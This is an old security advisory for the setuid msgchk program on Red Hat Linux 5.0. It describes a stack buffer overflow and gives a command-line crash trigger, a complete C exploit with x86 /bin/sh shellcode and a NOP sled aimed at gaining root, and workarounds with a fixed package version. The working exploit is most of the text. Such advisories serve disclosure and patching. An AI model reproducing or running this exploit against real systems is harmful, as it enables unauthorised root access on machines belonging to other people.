COMMAND

    msgchk

SYSTEMS AFFECTED

    Linux RedHat 5.0

PROBLEM

    Jorge Hurtado Rojo posted following msgchk exploit:

        msgchk -host `perl -e 'print "A" x 2000'`

    leads to a  segfault, which can  be exploited to  get root access.
    The exploit follows.

    /* Almost  everything here  taken from  Aleph One's  Article about
       stack smashing (Phrack 49) */

    #include <stdlib.h>

    #define DEFAULT_OFFSET                 0
    #define DEFAULT_BUFFER_SIZE            1018
    #define NOP                            0x90
    char shellcode[] =
       "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
       "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
       "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    unsigned long get_sp(void) {
       __asm__("movl %esp,%eax");
    }

    void main(int argc, char *argv[]) {
      char *buff, *ptr;
    char *args[5];
    char jorge[]="";
      long *addr_ptr, addr;
      int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
      int i;
      if (argc > 1) bsize  = atoi(argv[1]);
      if (argc > 2) offset = atoi(argv[2]);

      if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
      }

      addr = get_sp() - offset;
      printf("Using address: 0x%x\n", addr);

      ptr = buff;
      addr_ptr = (long *) ptr;
      for (i = 0; i < bsize; i+=4) {
        buff[i]=addr & 0xFF;
        buff[i+1]=(addr >> 8) & 0xFF;
        buff[i+2]=(addr >> 16) & 0xFF;
        buff[i+3]=(addr >> 24) & 0xFF;
      }

        *(addr_ptr++) = addr;

      for (i = 0; i < bsize/2; i++)
        buff[i] = NOP;

      ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
      for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

      buff[bsize - 1] = '\0';

      args[0]="/usr/bin/mh/msgchk";
      args[1]="-host";
      args[2]=buff;
      args[3]=NULL;
      execve(args[0],args,NULL);

    }

    You may want to check 'mh' vulnerabily under Linux section too.

SOLUTION

    Workaround is to remove suid bit, but you won't do anything  wrong
    by uninstalling the packet, compile it without RPOP / suid or  use
    a wrapper (safeload).

    This vulnerability is not present when using mh-6.8.4-6 in RH 5.0.
    msgchk ends with:

        msgchk: argument AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAA (2000 times) too long

    However, mh-6.8.4-6 is  not the version  shipped with RedHat  5.0.
    Thats the fixed version available in their errata page at

        http://www.redhat.com/support/docs/rhl/rh50-errata-general.html#mh